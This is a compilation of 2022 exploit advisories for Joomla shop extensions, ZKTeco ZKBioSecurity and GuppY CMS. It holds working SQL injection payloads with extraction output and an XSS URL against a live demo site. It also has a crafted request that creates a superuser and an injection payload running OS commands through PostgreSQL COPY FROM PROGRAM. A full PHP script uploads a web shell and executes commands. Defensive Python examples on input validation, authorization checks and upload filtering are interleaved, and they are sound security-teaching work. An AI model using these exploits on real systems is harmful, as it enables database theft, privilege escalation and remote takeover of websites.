<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : GeneticsPro - jkassa.com │<br />│ Software : Joomla JKassa ShoppingCart 2.0.0 │<br />│ Vuln Type: SQL Injection │<br />│ Method : GET │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /shop/men/sweatshirts.feed<br /><br />GET parameter 'manufacturer' is vulnerable<br /><br />---<br />Parameter: manufacturer (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: min_cost=25.6&max_cost=67.74&manufacturer=null) AND (SELECT 8420 FROM (SELECT(SLEEP(5)))bIVQ) AND (1590=1590&attribute=null&_=1664646035244&type=atom<br />---<br /><br />[+] Starting the Attack<br /><br />[INFO] the back-end DBMS is MySQL<br /><br />web application technology: Nginx, PHP 7.4.16<br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br /><br />current database: 'jkassa_umarket'<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : JoomTech - joomtech.net │<br />│ Software : Joomla Easy Shop 1.4.1 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path:/supermarket/index.php<br /><br />GET parameter 'file' is vulnerable to XSS<br /><br />https://demo.joomtech.net/supermarket/index.php?option=com_easyshop&task=ajax.loadImage&file=YXNzZXRzL2ltYWdlcy91c2VyX2N1c3RvbWVycy81NjMvYmFubmVyMi5qcGdzcW9obDxpbWcgc3JjPWEgb25lcnJvcj1hbGVydCgxKT5peG1kYw%3d%3d&size=medium<br /><br /><br />[-] Done<br /></code></pre>
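<p>Added example, not part of the Easy Shop advisory above. What makes that finding easy to miss is that the payload is not visible in the URL: the <code>file</code> parameter is base64, and the <code>&lt;img onerror&gt;</code> sits inside the decoded string, so a log review or WAF rule that only looks at the raw query string sees nothing. The scanner below percent-decodes every parameter, tries a base64 layer where the value has that shape, and reports which layer carried an XSS marker. The URLs and host (example.test) are constructed for the example; the parameter names are the advisory's.</p>

```python
# Added example (not JoomTech's code): find reflected-XSS markers in request
# parameters even when they are hidden under a base64 layer.
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote, urlsplit

XSS_MARKERS = re.compile(r"<\s*(img|svg|script|iframe|body)\b|\bon[a-z]+\s*=", re.I)
B64_SHAPE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def maybe_b64_decode(value: str):
    """Return the decoded text if `value` is well-formed base64 that decodes
    to printable UTF-8, otherwise None."""
    candidate = value.replace(" ", "+")  # a literal '+' in a query arrives as a space
    if len(candidate) < 8 or len(candidate) % 4 or not B64_SHAPE.fullmatch(candidate):
        return None
    try:
        text = base64.b64decode(candidate, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_url(url: str) -> list:
    """Return (parameter, layer, decoded value) for each query parameter
    that carries an XSS marker, either directly or under base64."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if XSS_MARKERS.search(value):
            hits.append((name, "plain", value))
            continue
        inner = maybe_b64_decode(value)
        if inner is not None and XSS_MARKERS.search(inner):
            hits.append((name, "base64", inner))
    return hits


def loadimage_url(path: str) -> str:
    """Build a constructed request in the shape of the advisory's endpoint."""
    encoded = quote(base64.b64encode(path.encode()).decode(), safe="")
    return ("https://example.test/supermarket/index.php?option=com_easyshop"
            f"&task=ajax.loadImage&file={encoded}&size=medium")


# Constructed inputs: an ordinary image path, the same path with markup
# appended (base64-wrapped as in the advisory), and a plain percent-encoded probe.
BENIGN_URL = loadimage_url("assets/images/banner2.jpg")
PROBE_URL = loadimage_url("assets/images/banner2.jpg<img src=a onerror=alert(1)>")
PLAIN_URL = "https://example.test/index.php?q=%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E"


if __name__ == "__main__":
    for label, url in (("benign", BENIGN_URL), ("base64", PROBE_URL), ("plain", PLAIN_URL)):
        print(label, scan_url(url))
```

<p>The base64 check is deliberately strict (length a multiple of four, alphabet only, printable result) so that ordinary parameter values such as <code>com_easyshop</code> never go through a decode attempt; for a WAF or log pipeline the same layered decoding would be applied to request bodies and cookies too.</p>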
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : JoomlaUX - joomlaux.com │<br />│ Software : JUX Charity Hub 1.0.4 Extension for Joomla │<br />│ Vuln Type: SQL Injection │<br />│ Method : GET │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise │<br />│ │<br />│ │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /extensions/charityhub/index.php/causes/grid-causes/grid-causes-no-sidebar/causes<br /><br />GET parameter 'title' is vulnerable<br /><br />---<br />Parameter: title (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)<br /> Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=-7388' OR 2114=2114#&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=1' AND (SELECT 4175 FROM(SELECT COUNT(*),CONCAT(0x71707a7871,(SELECT (ELT(4175=4175,1))),0x717a626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- GUzX&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=1' AND (SELECT 8556 FROM (SELECT(SLEEP(5)))SnfZ)-- awOv&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search<br />---<br /><br />[+] Starting the Attack<br /><br />[INFO] the back-end DBMS is MySQL<br />web application technology: PHP 7.3.19<br />back-end DBMS: MySQL >= 5.0 (MariaDB fork)<br />[INFO] fetching current 
database<br /><br />current database: 'joomlaux_charityhub2'<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>#######################ADVISORY INFORMATION#######################<br /><br />Product: ZKSecurity BIO<br /><br />Vendor: ZKTeco<br /><br />Version Affected: 3.0.5.0_R<br /><br />CVE: CVE-2022-36634<br /><br />Vulnerability: User privilege escalation<br /><br />#######################CREDIT#######################<br /><br />This vulnerability was discovered and researched by Caio Burgardt and<br />Silton Santos.<br /><br />#######################INTRODUCTION#######################<br /><br />Based on the hybrid biometric technology and computer vision technology,<br />ZKBioSecurity provides a comprehensive web-based security platform. It<br />contains multiple integrated modules: personnel, time & attendance, access<br />control, visitor management, offline & online consumption management, guard<br />patrol, parking, elevator control, entrance control, Facekiosk, intelligent<br />video management, mask and temperature detection module, and other smart<br />sub-systems.<br /><br />#######################VULNERABILITY DETAILS#######################<br /><br />The application's access control management does not check the session's<br />permissions correctly. 
An attacker with "Person Self-Login" or "User"<br />privilege can create a super user with full privileges in the application.<br /><br />#######################PROOF OF CONCEPT#######################<br /><br />POST /authUserAction!edit.action HTTP/1.1<br />Host: {HOST}<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------291763244192371568695079347<br />Content-Length: 1956<br />Origin: http://{HOST}:8088<br />Connection: close<br />Referer: http://{HOST}:8088/base_index.action<br />Cookie: <INSERT_LOW-PRIVILEGE_COOKIE_HERE><br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="authUser.username"<br /><br />test_privesc<br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="authUser.loginPwd"<br /><br />KDla123<br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="repassword"<br /><br />KDla123<br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="authUser.isActive"<br /><br />true<br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="authUser.isSuperuser"<br /><br />true<br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="groupIds"<br /><br /><br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="deptIds"<br /><br /><br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="areaIds"<br /><br /><br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="authUser.email"<br /><br /><br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="authUser.name"<br /><br /><br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="authUser.lastName"<br /><br /><br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="fingerTemplate"<br /><br /><br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="fingerId"<br /><br /><br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="logMethod"<br /><br />add<br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="un"<br /><br />1657813612925_286<br />-----------------------------291763244192371568695079347<br />Content-Disposition: form-data; name="systemCode"<br /><br />base<br />-----------------------------291763244192371568695079347--<br /><br />#######################END#######################<br /><br /></code></pre>
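<p>Added example, not part of the CVE-2022-36634 advisory and not ZKTeco's code. The request above works because the edit action binds <code>authUser.isSuperuser</code> (and the group, department and area ids) straight from the multipart form without asking what the calling session is allowed to do. The check a defender wants is the one below: which fields a caller may set is decided from the server's own session record, and a low-privilege caller submitting a privileged field is rejected (and therefore logged) rather than silently trimmed. The field names are the advisory's; <code>Session</code>, <code>UserRecord</code>, the role model and the in-memory store are assumptions constructed for this example.</p>

```python
# Added example (not ZKTeco's code): server-side allow-listing of the form
# fields a caller may set on a user record, keyed on the caller's session.
from dataclasses import dataclass


@dataclass
class Session:
    """What the server knows about the caller from its own session table."""
    username: str
    is_superuser: bool = False


@dataclass
class UserRecord:
    username: str
    is_superuser: bool = False
    is_active: bool = True
    email: str = ""
    name: str = ""


class Forbidden(Exception):
    """Raised, not swallowed, so the attempt ends up in the audit log."""


# Fields any authenticated user may change on their own record.
SELF_EDITABLE = {"authUser.loginPwd", "repassword", "authUser.email",
                 "authUser.name", "authUser.lastName"}
# Bookkeeping fields the client sends that carry no authorization meaning.
NEUTRAL = {"un", "systemCode", "fingerTemplate", "fingerId"}
# Everything else (authUser.isSuperuser, groupIds, deptIds, areaIds,
# authUser.isActive, authUser.username, logMethod=add) changes identity or
# privilege and is reserved for superuser sessions.


def apply_user_edit(session: Session, form: dict, store: dict) -> UserRecord:
    """Apply a submitted authUser form, enforcing the session's permissions.

    A non-superuser may only touch SELF_EDITABLE fields of its own record;
    a superuser may create users and set privileged fields.
    """
    if not session.is_superuser:
        illegal = set(form) - SELF_EDITABLE - NEUTRAL
        if illegal:
            raise Forbidden(f"{session.username} tried to set {sorted(illegal)}")
        target = store[session.username]
    else:
        target_name = form.get("authUser.username", session.username)
        target = store.setdefault(target_name, UserRecord(username=target_name))
        if "authUser.isSuperuser" in form:
            target.is_superuser = form["authUser.isSuperuser"] == "true"
        if "authUser.isActive" in form:
            target.is_active = form["authUser.isActive"] == "true"
    if "authUser.email" in form:
        target.email = form["authUser.email"]
    if "authUser.name" in form:
        target.name = form["authUser.name"]
    return target


def attempt(session: Session, form: dict, store: dict) -> str:
    """Run one edit and summarise the outcome as a string for the demo."""
    try:
        rec = apply_user_edit(session, form, store)
    except Forbidden as exc:
        return f"forbidden: {exc}"
    return f"ok: {rec.username} superuser={rec.is_superuser}"


# Constructed form modelled on the advisory's multipart request.
PRIVESC_FORM = {
    "authUser.username": "test_privesc",
    "authUser.loginPwd": "KDla123",
    "repassword": "KDla123",
    "authUser.isActive": "true",
    "authUser.isSuperuser": "true",
    "logMethod": "add",
    "un": "1657813612925_286",
    "systemCode": "base",
}


def demo() -> dict:
    """Constructed store: one self-login user and one administrator."""
    store = {"selflogin_user": UserRecord("selflogin_user"),
             "admin": UserRecord("admin", is_superuser=True)}
    return {
        "low_priv_privesc": attempt(Session("selflogin_user"), PRIVESC_FORM, store),
        "created_by_low_priv": "test_privesc" in store,
        "low_priv_self_edit": attempt(Session("selflogin_user"),
                                      {"authUser.email": "me@example.test"}, store),
        "admin_create": attempt(Session("admin", is_superuser=True), PRIVESC_FORM, store),
        "created_by_admin": store.get("test_privesc") is not None
                            and store["test_privesc"].is_superuser,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

<p>The design point is that the privilege decision never reads the form: the form can say <code>isSuperuser=true</code> all it likes, and the only thing that matters is <code>session.is_superuser</code>, which the client cannot set.</p>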
<pre><code>#######################ADVISORY INFORMATION#######################<br /><br />Product: ZKSecurity BIO<br /><br />Vendor: ZKTeco (https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)<br /><br />Version Affected: 4.1.2<br /><br />CVE: CVE-2022-36635<br /><br />Vulnerability: SQL Injection (with a plus: RCE)<br /><br />#######################CREDIT#######################<br /><br />This vulnerability was discovered and researched by Caio Burgardt and<br />Silton Santos.<br /><br />#######################INTRODUCTION#######################<br /><br />Based on the hybrid biometric technology and computer vision technology,<br />ZKBioSecurity provides a comprehensive web-based security platform. It<br />contains multiple integrated modules: personnel, time & attendance, access<br />control, visitor management, offline & online consumption management, guard<br />patrol, parking, elevator control, entrance control, Facekiosk, intelligent<br />video management, mask and temperature detection module, and other smart<br />sub-systems.<br /><br />#######################VULNERABILITY DETAILS#######################<br /><br />The parameters opTimeBegin and opTimeEnd are simply concatenated to the SQL<br />query, with only a sanitization filter in front of it. 
Using comments<br />(/**/) in place of spaces was enough to confuse and bypass the filter.<br /><br />#######################PROOF OF CONCEPT#######################<br /><br />Note that the response to this request is delayed by 10 seconds:<br /><br />POST /baseOpLog.do HTTP/1.1<br />Host: {HOST}<br />Content-Type: application/x-www-form-urlencoded<br />Cookie: SESSION={COOKIE}; menuType=icon-only<br />Content-Length: 208<br /><br />list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50<br /><br />With the following request body, a remote command can be executed:<br /><br />list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='<br /><br /><br />#######################END#######################<br /><br /></code></pre>
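<p>Added example, not part of the CVE-2022-36635 advisory and not ZKTeco's code. The advisory says the two timestamp parameters reach the SQL string with only a "sanitization filter" in front, and that writing <code>/**/</code> instead of spaces got past it. Below, a keyword blocklist of the kind that fails that way sits beside what a defender wants instead: positive validation of the timestamp format, followed by a bound query parameter, so the database never receives user input as SQL text. The blocklist pattern, table and rows are constructed for the example, and SQLite stands in for the PostgreSQL backend the payload targets.</p>

```python
# Added example (not ZKTeco's code): a blocklist that /**/ defeats, next to
# format validation plus a parameterized query.
import re
import sqlite3
from datetime import datetime

# A blocklist that looks for SQL verbs followed by whitespace. Writing
# "select/**/pg_sleep(10)" puts no whitespace after the verb, so this kind
# of check never fires; every blocklist has gaps of this sort.
BLOCKLIST = re.compile(r"\b(select|insert|update|delete|drop|copy)\s+", re.I)


def blocklist_allows(value: str) -> bool:
    """The weak check: True means the filter would let the value through."""
    return BLOCKLIST.search(value) is None


def is_valid_timestamp(value: str) -> bool:
    """Positive validation: only 'YYYY-MM-DD HH:MM:SS' is accepted."""
    try:
        datetime.strptime(value, "%Y-%m-%d %H:%M:%S")
    except ValueError:
        return False
    return True


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the BASE_OPLOG table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE base_oplog (create_time TEXT, op TEXT)")
    conn.executemany("INSERT INTO base_oplog VALUES (?, ?)", [
        ("2022-06-26 08:00:00", "login"),
        ("2022-07-01 12:30:00", "edit"),
        ("2022-09-30 23:00:00", "login"),
    ])
    return conn


def count_oplog(conn: sqlite3.Connection, begin: str, end: str) -> int:
    """Validate both bounds, then bind them. Because the values travel as
    parameters, quotes, comments or semicolons in them cannot alter the query."""
    if not (is_valid_timestamp(begin) and is_valid_timestamp(end)):
        raise ValueError("opTimeBegin/opTimeEnd must be YYYY-MM-DD HH:MM:SS")
    row = conn.execute(
        "SELECT COUNT(1) FROM base_oplog WHERE create_time BETWEEN ? AND ?",
        (begin, end),
    ).fetchone()
    return row[0]


def safe_count(conn, begin, end):
    """Wrapper that turns a rejected value into None instead of raising."""
    try:
        return count_oplog(conn, begin, end)
    except ValueError:
        return None


# Constructed probe in the shape of the advisory's payload: comments for spaces.
PROBE = "2022-06-26 00:00:00')/**/tmp;select/**/pg_sleep(10);/**/select/**/1/**/where/**/'1'='1"


if __name__ == "__main__":
    db = make_db()
    print("blocklist lets the probe through:", blocklist_allows(PROBE))
    print("format validation accepts the probe:", is_valid_timestamp(PROBE))
    print("rows in range:", count_oplog(db, "2022-06-26 00:00:00", "2022-09-26 23:59:59"))
    print("probe as begin bound:", safe_count(db, PROBE, "2022-09-26 23:59:59"))
```

<p>Either half of the fix would have stopped this particular payload; both together are the habit worth keeping, because the validation gives a clean error message at the edge and the bound parameter protects the query even when some other code path skips validation.</p>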
<pre><code># Exploit Title: GuppY 6.00.10 CMS Remote Code Execution<br /># Date: Sep 30, 2022<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.freeguppy.org/<br /># Software Link: https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2<br /># Version: 6.00.10<br /># Tested on: Linux<br /><br />#!/usr/bin/php<br /><br /><?php<br /><br />$username = "Admin"; // Administrator username<br />$password = "rose1337"; // Administrator password<br /><br />$options = getopt('u:c:');<br /><br />if (!isset($options['u'], $options['c'])) {<br />    die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\n");<br />}<br /><br />$target = $options['u'];<br />$command = $options['c'];<br /><br />// Administrator login<br />$cookie = "cookie.txt";<br />$url = "{$target}guppy/connect.php";<br /><br />$postdata = "connect=on&uuser=old&pseudo=" . $username . "&uid=" . $password;<br />$curlObj = curl_init();<br /><br />curl_setopt($curlObj, CURLOPT_URL, $url);<br />curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($curlObj, CURLOPT_HEADER, 1);<br />curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($curlObj, CURLOPT_POSTFIELDS, $postdata);<br />curl_setopt($curlObj, CURLOPT_POST, 1);<br />curl_setopt($curlObj, CURLOPT_FOLLOWLOCATION, true);<br />curl_setopt($curlObj, CURLOPT_CONNECTTIMEOUT, 30);<br />curl_setopt($curlObj, CURLOPT_TIMEOUT, 30);<br />curl_setopt($curlObj, CURLOPT_COOKIEFILE, $cookie);<br />curl_setopt($curlObj, CURLOPT_COOKIEJAR, $cookie);<br />$result = curl_exec($curlObj);<br /><br />// uploading shell<br />$url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";<br /><br />$post = '------WebKitFormBoundarygA1APFcUlkIaWal4<br />Content-Disposition: form-data; name="rep"<br /><br />file<br />------WebKitFormBoundarygA1APFcUlkIaWal4<br />Content-Disposition: form-data; name="ficup"; filename="shell.php"<br />Content-Type: application/x-php<br /><br /><?php system($_GET["cmd"]); ?><br /><br />------WebKitFormBoundarygA1APFcUlkIaWal4--<br />';<br /><br />$headers = array(<br />    'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',<br />    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',<br />    'Accept-Encoding: gzip, deflate',<br />    'Accept-Language: en-US,en;q=0.9'<br />);<br />curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);<br />curl_setopt($curlObj, CURLOPT_URL, $url2);<br />curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);<br />curl_setopt($curlObj, CURLOPT_POST, true);<br />curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($curlObj, CURLOPT_FOLLOWLOCATION, true);<br />curl_setopt($curlObj, CURLOPT_CONNECTTIMEOUT, 30);<br />curl_setopt($curlObj, CURLOPT_TIMEOUT, 30);<br />curl_setopt($curlObj, CURLOPT_COOKIEFILE, $cookie);<br />curl_setopt($curlObj, CURLOPT_COOKIEJAR, $cookie);<br /><br />$data = curl_exec($curlObj);<br /><br />// Executing the shell<br />$shell = "{$target}guppy/file/shell.php?cmd=" . $command;<br />curl_setopt($curlObj, CURLOPT_URL, $shell);<br />curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));<br />curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($curlObj, CURLOPT_HEADER, false);<br />curl_setopt($curlObj, CURLOPT_POST, false);<br /><br />$exec_shell = curl_exec($curlObj);<br /><br />$code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);<br /><br />if ($code != 200) {<br />    echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the credentials\n";<br />} else {<br />    print("\n");<br />    print($exec_shell);<br />}<br />curl_close($curlObj);<br /><br />?><br /></code></pre>
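<p>Added example, not part of the GuppY exploit above and not GuppY's code. The exploit needs three things to line up: an administrator login, an upload form that accepts <code>shell.php</code> with <code>Content-Type: application/x-php</code>, and an upload directory from which the web server will execute it. The first is a credential problem; the second and third are the upload handler's to fix. The function below is the decision an upload endpoint should make before writing anything to disk: an allow-list of extensions, agreement between the extension and the file's leading bytes, no PHP open tag anywhere in the body, and a server-chosen filename. The magic numbers are the real PNG/JPEG/GIF/PDF ones; the sample uploads are constructed for the example.</p>

```python
# Added example (not GuppY's code): validating an upload before it is stored.
import posixpath
import re
import secrets
from dataclasses import dataclass

MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.I)


@dataclass
class Verdict:
    accepted: bool
    reason: str
    stored_name: str = ""  # server-chosen name, never the client's


def check_upload(filename: str, content: bytes) -> Verdict:
    """Decide whether an uploaded file may be stored, and under what name."""
    # Drop any directory part; the client's path is never trusted.
    base = posixpath.basename(filename.replace("\\", "/"))
    if "." not in base:
        return Verdict(False, "no extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in MAGIC:
        return Verdict(False, f"extension .{ext} not allowed")
    if not content.startswith(MAGIC[ext]):
        return Verdict(False, f"content does not start like a .{ext} file")
    if PHP_OPEN_TAG.search(content):
        # A valid image with PHP appended is still a webshell if the server
        # can ever be made to execute it; refuse polyglots outright.
        return Verdict(False, "PHP open tag inside file body")
    return Verdict(True, "ok", f"{secrets.token_hex(8)}.{ext}")


PNG_STUB = MAGIC["png"] + b"\x00\x00\x00\rIHDR" + b"\x00" * 17
JPEG_STUB = MAGIC["jpg"] + b"\xe0\x00\x10JFIF\x00"

# Constructed uploads: a PHP file, a double extension, a real image, an
# upper-case extension, an image with PHP appended, a text file, and a
# traversal-style name.
SAMPLES = {
    "shell.php": b"<?php echo 1; ?>",
    "shell.php.png": b"<?php echo 1; ?>",
    "banner.png": PNG_STUB,
    "photo.JPG": JPEG_STUB,
    "polyglot.png": PNG_STUB + b"<?php echo 1; ?>",
    "notes.txt": b"hello",
    "..\\..\\evil.gif": b"GIF89a" + b"\x00" * 10,
}


def demo() -> dict:
    """Run every sample through check_upload and return name -> Verdict."""
    return {name: check_upload(name, body) for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        suffix = f" -> {verdict.stored_name}" if verdict.accepted else ""
        print(f"{name!r:22} accepted={verdict.accepted!s:5} {verdict.reason}{suffix}")
```

<p>The random stored name does double duty: it neutralises traversal in the client's filename and it means an attacker who does get a file through cannot predict the URL to request it from. Storing uploads outside the document root, or with script execution disabled for that directory, is the remaining layer this function cannot provide.</p>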
